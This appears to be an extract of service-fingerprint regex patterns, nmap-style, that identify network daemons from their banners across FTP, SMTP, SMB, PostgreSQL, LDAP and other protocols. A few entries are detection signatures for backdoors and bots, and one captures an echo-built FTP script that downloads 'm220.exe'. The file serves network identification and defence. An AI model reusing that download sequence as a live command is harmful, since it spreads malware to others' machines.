+\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 